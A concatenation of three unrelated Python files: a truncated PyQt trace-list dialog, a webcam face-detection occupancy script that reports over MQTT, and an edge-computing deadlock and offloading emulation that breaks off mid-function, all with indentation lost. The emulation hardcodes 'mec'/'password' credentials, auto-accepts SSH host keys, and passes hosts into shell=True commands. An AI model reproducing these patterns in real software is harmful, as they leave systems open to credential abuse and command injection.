self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.model: QTraceTableModel = QTraceTableModel()
self.setModel(self.model)
class QChessTraceListDialog(QDialog):
"""
Implements a CHESS trace list dialog.
"""
def __init__(self, workspace: 'Workspace', parent=None):
super().__init__(parent)
if slacrs is None:
            QMessageBox.critical(self,
                                 "Slacrs is not installed",
                                 "Cannot import slacrs. Please make sure slacrs is properly installed.",
                                 QMessageBox.Ok)
self.close()
return
self.workspace = workspace
self.trace_ids: Optional[List[Tuple[str,str]]] = None # input ID, trace ID
self.setMinimumWidth(400)
self._status_label: QLabel = None
self._table: QTraceTableView = None
self._ok_button: QPushButton = None
self._cancel_button: QPushButton = None
self.setWindowTitle("Open traces from CHECRS")
self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)
self._init_widgets()
self._status_label.setText("Loading...")
self.workspace.main_window.app.processEvents()
th = threading.Thread(target=self._load_traces, daemon=True)
th.start()
def _init_widgets(self):
# table
self._table = QTraceTableView()
# status
status_lbl = QLabel("Status:")
self._status_label = QLabel()
status_layout = QHBoxLayout()
status_layout.addWidget(status_lbl)
status_layout.addWidget(self._status_label)
status_layout.addStretch(0)
# buttons
self._ok_button = QPushButton("Ok")
self._ok_button.clicked.connect(self._on_ok_button_clicked)
self._cancel_button = QPushButton("Cancel")
self._cancel_button.clicked.connect(self._on_cancel_button_clicked)
buttons_layout = QHBoxLayout()
buttons_layout.addWidget(self._ok_button)
buttons_layout.addWidget(self._cancel_button)
layout = QVBoxLayout()
layout.addWidget(self._table)
layout.addLayout(status_layout)
layout.addLayout(buttons_layout)
self.setLayout(layout)
def _load_traces(self):
from slacrs.model import Input, Trace # pylint:disable=import-outside-toplevel,import-error
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
connector = self.workspace.plugins.get_plugin_instance_by_name("ChessConnector")
if connector is None:
return
session = slacrs.Slacrs(database=Conf.checrs_backend_str).session()
target_image_id = connector.target_image_id
if not target_image_id:
return
traces: List[TraceDescriptor] = [ ]
db_traces = session.query(Trace).join(Trace.input).filter(
Input.target_image_id == target_image_id
)
for db_trace in db_traces:
db_trace: Trace
t = TraceDescriptor(db_trace.id, db_trace.input_id, db_trace.created_at, "block trace")
traces.append(t)
session.close()
gui_thread_schedule_async(self._update_table, args=(traces,))
def _update_table(self, traces):
self._table.model.traces = traces
self._table.viewport().update()
self._status_label.setText("Ready.")
#
# Events
#
def _on_ok_button_clicked(self):
selection_model = self._table.selectionModel()
if not selection_model.hasSelection():
QMessageBox.warning(self,
"No target is selected",
"Please select a CHESS target to continue.",
QMessageBox.Ok)
return
rows = selection_model.selectedRows()
self.trace_ids = [ ]
for row in rows:
trace = self._table.model.traces[row.row()]
self.trace_ids.append((trace.input_id, trace.trace_id))
self.close()
def _on_cancel_button_clicked(self):
self.close()
|
face-recognition-occupancy.py
|
# import the necessary packages
import numpy as np
import argparse
import cv2
from time import sleep
import paho.mqtt.client as mqtt
from threading import Thread
import json
State = True
webcam = None
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", default="deploy.prototxt.txt",
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", default="res10_300x300_ssd_iter_140000.caffemodel",
help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.6,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
with open("config.json") as conf:
config = json.load(conf)
# mqtt connection
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected with result code " + str(rc))
print("Subscribing to topic",(config["mqttTopic"] + "/cmd"))
client.subscribe((config["mqttTopic"] + "/cmd"))
else:
print("Bad connection with result code " + str(rc))
client.loop_stop()
exit(1)
def on_message(client, userdata, message):
global State
print("message received " ,str(message.payload.decode("utf-8")))
print("message topic=",message.topic)
print("message qos=",message.qos)
print("message retain flag=",message.retain)
if (str(message.payload.decode("utf-8")) == "off"):
State = False
if (str(message.payload.decode("utf-8")) == "on"):
State = True
client = mqtt.Client(config["mqttClient"])
client.username_pw_set(username=config["mqttUser"], password=config["mqttPass"])
client.on_connect = on_connect
client.on_message=on_message #attach function to callback
try:
client.connect(config["mqttServer"], 1883, 60)
except:
print("Error: MQTT connection failed")
exit(1)
client.loop_start()
# Define the thread that will continuously pull frames from the camera
class CameraBufferCleanerThread:
def __init__(self):
self._running = True
self.last_frame = None
def terminate(self):
self._running = False
def run(self, camera):
self._running = True
while self._running:
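            # Keep reading so OpenCV's internal capture buffer never backs up;
            # last_frame therefore always holds the most recently grabbed frame.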
ret, self.last_frame = camera.read()
# load serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# create a cleaning thread object
cam_cleaner = CameraBufferCleanerThread()
t = None
#main loop
Startup = True
while True:
if State:
if Startup:
# startup webcam
print("[INFO] starting up webcam..")
webcam = cv2.VideoCapture(0)
# Start the cleaning thread
t = Thread(target = cam_cleaner.run, args =(webcam, ))
t.start()
Startup = False
if cam_cleaner.last_frame is not None:
frame = cam_cleaner.last_frame
# load the input image and construct an input blob for the image
# by resizing to a fixed 300x300 pixels and then normalizing it
image = frame
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
# pass the blob through the network and obtain the detections and
# predictions
print("[INFO] computing object detections...")
net.setInput(blob)
detections = net.forward()
detected = False
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by ensuring the `confidence` is
# greater than the minimum confidence
if confidence > args["confidence"]:
detected = True
print(confidence)
print("publishing occupied")
client.publish(config["mqttTopic"], "Occupied")
# client.publish((config["mqttTopic"] + "/confidence"), str(confidence))
if not detected:
print("publishing unoccupied")
client.publish(config["mqttTopic"], "Unoccupied")
# client.publish((config["mqttTopic"] + "/confidence"), str(confidence))
sleep(2)
if not State:
# terminate the cleaning thread
cam_cleaner.terminate()
    if t is not None:
if not State and not t.is_alive():
# stop the webcam and set the startup variable
webcam.release()
Startup = True
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}]  # [[task_list], {wait_time}] => records tasks re-offloaded to this MEC to execute
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
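# Pseudo-random index generator: returns an integer in [0, _range) derived from
# modular exponentiation of two random values.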
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
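# Simulates scheduling over one hyperperiod (the LCM of all task periods) one
# time unit at a time: the queued task with the earliest next deadline runs,
# finished jobs are dequeued, and the resulting non-idle execution order is
# expanded into a per-unit sequence via task_time_map().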
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
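# Deadlock handling (wound-wait style): admit any process whose resource need
# fits what is currently available; when a process cannot be satisfied, the
# remaining process holding the most resources (or the blocked process itself)
# is marked for offloading and its allocation is reclaimed before continuing.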
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # Advertised wait = total waiting time / 2; the plain average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
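# Splits the safe sequence: tasks whose latency bound (t_time[task][1]) exceeds
# their computed local waiting time run locally, the rest are handed to the
# cooperative platform.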
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of MEC wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
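# Cooperative offloading policy: each candidate task is sent to the MEC with the
# smallest moving-average waiting time when its resource need fits the capacity
# vector and either that waiting time beats the task's latency bound or the
# MEC's RTT beats the cloud's RTT; otherwise (or when no MEC wait times are
# known yet) the task is published to the cloud broker.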
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
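# Listens on the offloading multicast group: messages addressed to this node's
# id are results of tasks this node previously offloaded and are published back
# to the originating client over MQTT, while 'ex' requests addressed to this
# node are queued in reoffload_list for local execution.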
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
                # snapshot the shared list so the removals below do not mutate what is being iterated
                o = [list(reoffload_list[0]), dict(reoffload_list[1])]
                offload_check[1] += len(o[0])
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
else:
        os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1  # main-loop flag; set to 0 by the broker 'stop' message to terminate
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
            stop = True  # signal the helper threads (receive/offload/broker) to stop
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
